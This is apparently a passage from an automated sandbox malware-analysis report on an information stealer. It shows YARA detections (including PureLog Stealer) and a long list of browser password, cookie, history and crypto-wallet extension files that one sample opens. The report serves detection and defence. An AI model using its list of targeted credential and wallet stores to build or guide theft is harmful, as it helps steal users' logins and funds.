                                Source: Yara matchFile source: 43.2.f8e8a2d2f0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a370000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a370000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a2ba000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.2.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.f891ed3167.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.f8e8a2d2f0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a320000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a2ba000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.9c1024a1f1.exe.fc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A2BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.22706302291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.22744830820.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.23299926904.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.22450863752.0000000000FC1000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.f891ed3167.exe.3d99550.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.4078630.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.69b0000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.69b0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.0.f8e8a2d2f0.exe.dd0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.f891ed3167.exe.3d99550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.4078630.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.0.f891ed3167.exe.910000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.23317961529.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.23336208269.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe, type: DROPPED
                                Found many strings related to Crypto-Wallets (likely being stolen)
                                Source: 9c1024a1f1.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                                Source: 9c1024a1f1.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                                Source: 9c1024a1f1.exeString found in binary or memory: Wallets/Exodus
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                                Source: 9c1024a1f1.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                                Source: powershell.exe, 00000006.00000002.22124066943.0000000007A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Tries to harvest and steal ftp login credentials
